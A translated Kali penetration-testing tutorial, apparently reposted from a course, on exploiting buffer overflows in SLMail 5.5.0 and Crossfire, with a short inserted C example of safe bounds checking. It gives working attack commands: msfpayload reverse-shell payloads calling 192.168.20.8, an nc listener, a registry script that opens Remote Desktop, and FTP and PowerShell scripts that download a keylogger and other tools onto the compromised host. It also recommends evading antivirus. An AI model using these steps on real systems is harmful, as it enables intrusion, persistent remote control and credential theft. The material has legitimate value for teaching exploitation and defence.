


Linux Penetration Testing Tutorial: Teach you step-by-step on stack overflow from getting started to giving up
These notes are based on the Kali Linux penetration testing course by Teacher Yuan Fanghong of the Security Niu Classroom.
The root of every vulnerability is input data. Buffer overflows arise because the boundary between data and code is blurred: when the bounds of a buffer are not strictly enforced, malformed data passed into a variable, or an error in the program's operation, can overrun the buffer and overwrite data in the adjacent memory region. Successfully changing that memory can lead to process hijacking, execution of malicious code, and control of the server.
To better understand the principle of buffer overflow, refer to the two articles reprinted by the author:
Teach you step by step about stack overflow from getting started to giving up (Part 1)
Teach you step by step about stack overflow from getting started to giving up (Part 2)
1. Ways to discover vulnerabilities
(1) Source code audit
The software's source code may be obtained (through social engineering or other means) for review and debugging. The conditions are demanding, and the source code is usually unavailable.
(2) Reverse engineering
Use reverse engineering to obtain the assembly code for analysis. Analysing assembly code is laborious and difficult.
(3) Fuzzing
Fuzzing is a way to discover software vulnerabilities by feeding unexpected input to the target system and monitoring for abnormal results. Typically a valid input is taken and randomly mutated, with a software debugging tool (such as Immunity Debugger) attached to observe the effect.
2. Fuzz testing process
First, we need to understand some of the security protections against buffer overflow, because these protection mechanisms have to be bypassed during fuzzing.
(1) Windows
The test software is 'SLMail 5.5.0 Mail Server', whose PASS command has a buffer overflow vulnerability. Basic idea (Immunity Debugger is used as the debugging tool):
1. Use a Python script to test whether the PASS command overflows when it receives a large amount of data. Usually, if there is no overflow after 3000 characters, there is probably no overflow vulnerability.
2. After discovering the overflow, determine the offset in the input that lands in EIP. The basic methods are the binary search method and the unique string method. The unique string can be generated with the Metasploit script /usr/share/metasploit-framework/tools/pattern_create.rb 3000.
3. Change EIP to the memory address where the shellcode sits and write the shellcode into that address space; when the program reads the EIP register value it jumps to the shellcode segment and executes it.
4. With the debugger we found that after the sent data fills EIP, it goes on to fill the space pointed to by ESP, so the shellcode is placed at the location of ESP.
5. Determine the distance from the ESP address to the bottom of the stack, that is, the size of shellcode that can be stored. Use a Python script to send data to the software and watch in the debugger how much of it ends up in the space pointed to by ESP. The memory layout of a process on a modern computer system is shown in the figure:
Figure 1 Process memory space view
6. Because of ASLR, the address of the function call stack changes randomly every time the program runs, so hard-coding an address is not feasible. The alternative is to find a system module loaded at a fixed memory address and locate a JMP ESP instruction inside it; that instruction jumps directly to ESP, which then executes the shellcode. Use the mona.py script to list the loaded modules and find a system module that is not protected by DEP or ASLR, so that a "return address" inside it can point at JMP ESP: `!mona modules`. With /usr/share/metasploit-framework/tools/nasm_shell.rb, convert the assembly instruction jmp esp into its opcode bytes FF E4, and search for those bytes in the module: `!mona find -s "\xff\xe4" -m slmfc.dll`. After finding the address of the instruction, fill it into EIP, construct the shellcode and remove bad characters: `./msfpayload win32_reverse LHOST=192.168.20.8 LPORT=443 R | ./msfencode -b "\x00\x0a\x0d"`
Note: the payload chosen when constructing the shellcode is a reverse connection rather than a bind (direct connection). This avoids the firewall's blocking policy.
7. Finally, listen on the port: `nc -vlp 443`. If the shellcode exits with the ExitProcess method after running, the whole process exits and the mail service crashes. SLMail is a thread-based application; using the ExitThread method instead keeps the whole service from crashing, so the overflow can be triggered repeatedly: `./msfpayload win32_reverse LHOST=192.168.20.8 EXITFUNC=thread LPORT=443 R | ./msfencode -b "\x00\x0a\x0d"`
Note: different programs, protocols and vulnerabilities treat particular characters as bad characters. Those characters have fixed meanings, so bad characters must not appear in the return address, the shellcode or the buffer. Send the 256 characters 0x00-0xff and find all the bad characters. They can be encoded away with the Metasploit script ./msfencode.
8. To control the target further, you can enable Remote Desktop by changing the registry. More than 90% of Windows configuration can be done by changing the registry:
```
echo Windows Registry Editor Version 5.00>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
```
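The PASS overflow probed in steps 1 and 2 above comes down to an unbounded copy of a client-supplied argument into a fixed stack buffer. The following C example is added here and is not code from the tutorial or from SLMail: it shows that unchecked pattern beside a bounded handler that rejects an oversized argument, with PASS_MAX, the function names and the 3000-byte probe helper being assumptions constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define PASS_MAX 64   /* assumed stack buffer size, chosen for this example */

/* Vulnerable pattern: the argument length is never compared with the
 * destination, so a long PASS argument runs past buf into the saved frame
 * pointer and return address above it (the EIP overwrite the tutorial sees).
 * Only ever called with short input in this example. */
void handle_pass_unchecked(const char *arg) {
    char buf[PASS_MAX];
    strcpy(buf, arg);   /* no bound: overflows once strlen(arg) >= PASS_MAX */
}

/* Hardened pattern: check the length against the buffer before copying,
 * copy with an explicit bound and always terminate. Returns true only when
 * the argument was accepted. */
bool handle_pass_checked(const char *arg, size_t arglen) {
    char buf[PASS_MAX];
    if (arglen >= sizeof buf)   /* must leave room for the terminator */
        return false;           /* caller answers e.g. "-ERR argument too long" */
    memcpy(buf, arg, arglen);
    buf[arglen] = '\0';
    return true;
}

/* Handle one raw line from the socket. Returns 1 if a PASS argument was
 * accepted, 0 if it was rejected as too long, -1 if this is not PASS. */
int process_line(const char *line, size_t len) {
    if (len < 5 || strncmp(line, "PASS ", 5) != 0)
        return -1;
    const char *arg = line + 5;
    size_t arglen = len - 5;
    while (arglen > 0 && (arg[arglen - 1] == '\r' || arg[arglen - 1] == '\n'))
        arglen--;               /* strip the CRLF line ending */
    return handle_pass_checked(arg, arglen) ? 1 : 0;
}

/* Build the tutorial's kind of probe, "PASS " + n bytes of 'A' + CRLF, and
 * return process_line's verdict on it (n is capped at 4096 here). */
int probe_result(size_t n) {
    static char line[5 + 4096 + 2];
    if (n > 4096) n = 4096;
    memcpy(line, "PASS ", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 2);
    return process_line(line, 5 + n + 2);
}

int main(void) {
    handle_pass_unchecked("short");           /* safe: well under PASS_MAX */
    return probe_result(3000) == 0 ? 0 : 1;   /* a 3000-byte probe must be rejected */
}
```

The bounded handler turns the 3000-character probe from step 1 into a clean protocol error instead of a crash, which is also the behaviour a fuzzing run should be looking for after a fix.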
(2) Linux
The test software is 'Crossfire' 1.9.0, which has a buffer overflow vulnerability when accepting inbound socket connections. The basic idea is the same as for Windows fuzzing (edb is used as the debugging tool), so it is not repeated here. The following points need attention:
1. Debug command: `edb --run /usr/games/crossfire/bin/crossfire`
2. When verifying the buffer overflow, we found that only when the payload is exactly 4368 bytes can the value of EIP be overwritten precisely. The space pointed to by ESP then has only 7 bytes left, which is not enough for the shellcode, so we searched in edb for a register whose contents are completely covered by our data and found EAX; as a workaround, jump from ESP to EAX to execute the shellcode.
3. Selecting and modifying an EXP
Exploit code (EXP) for all kinds of software vulnerabilities has been published online for a long time. We can choose a trustworthy EXP source and study or modify the code from there; in particular, the shellcode must not be used carelessly, because it may contain malware. The programming languages that generally need to be mastered when working on Linux systems include Python, C, C++, Ruby, etc. Several reliable EXP sources:
After obtaining an EXP, you need to pay attention to the following points:
4. Post-exploitation stage
This includes further operations such as uploading tools, elevating privileges, erasing attack traces and installing backdoors. Only file upload is discussed here. Uploading files is the basis for planting Trojans and installing backdoors; it mainly consists of transferring files through the shell obtained, based on the information gathered about the target operating system.
(1) Windows
First, understand that the shell obtained by listening on a port with nc is a non-interactive shell, so operation is limited in situations that require interaction (for example, tab completion is hard to use and some parameters are hard to enter interactively). You therefore need to upload another remote-control program, such as Gray Pigeon. Here we mainly discuss how to upload such a remote-control program:
1. Linux side: configure an FTP service
There are three ways to log in to FTP:
```
apt-get install vsftpd   # there are many FTP servers for Linux; vsftpd is used here
vim /etc/vsftpd/vsftpd.conf   # configure vsftpd; login with a system user is used here
# add the following configuration
local_root=/home/ftpduser/   # home directory after a system user logs in
# a directory for per-user configuration files can be set: user_config_dir=/etc/vsftpd/ftpduser_config/
# a specific user ftpuser1 can be configured individually by creating a file named ftpuser1 (same as the user name) in the directory given by user_config_dir and writing the settings there
chroot_local_user=YES   # when YES, all users are confined to their home directory
chroot_list_enable=NO   # when YES, the users in chroot_list_file are the exceptions; when NO, there are no exceptions
chroot_list_file=/etc/vsftpd.chroot_list   # if chroot_local_user=NO and chroot_list_enable=YES, all users may access any directory while the users in chroot_list_file are confined to their home directory
userlist_deny=NO   # when YES, users listed in /etc/vsftpd/user_list cannot access the FTP server; when NO, only the listed users are allowed to
userlist_enable=YES   # /etc/vsftpd/user_list takes effect
echo ftpduser1 >> /etc/vsftpd/user_list   # the list file that denies or allows users of vsftpd
# !! note: the user list in user_list differs from ftpusers; ftpusers is not affected by any option, it is a blacklist and is always in effect
mkdir /home/ftpduser
useradd -d /home/ftpduser/ftpuser1 -s /sbin/nologin ftpduser1
service vsftpd start
```
2. Windows side: because the system lacks a pre-installed download tool, the transfer has to be arranged by hand
(1) Transfer files with FTP
Because the non-interactive shell cannot log in to the FTP service interactively, write an FTP script:
```
echo open 192.168.1.2 21>ftp.txt
echo ftpduser1>>ftp.txt
echo passw0rd>>ftp.txt
echo bin>>ftp.txt
echo GET whoami.exe>>ftp.txt
echo GET klogger.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
```
(2) Transfer files with PowerShell
```
echo $storageDir = $pwd >wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.1.2/whoami.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -Nologo -NonInteractive -Noprofile -File wget.ps1
```
(2) Linux
Uploading files with tools that ship with the system, such as netcat, curl and wget, is easy to do and is not described further.
Note: uploaded files must not be removed by the target system's antivirus software, so use legitimate remote-control software, such as nc, wherever possible.
The above is the detailed content of Linux Penetration Testing Tutorial: Teach you step-by-step on stack overflow from getting started to giving up. For more information, please follow other related articles on the PHP Chinese website!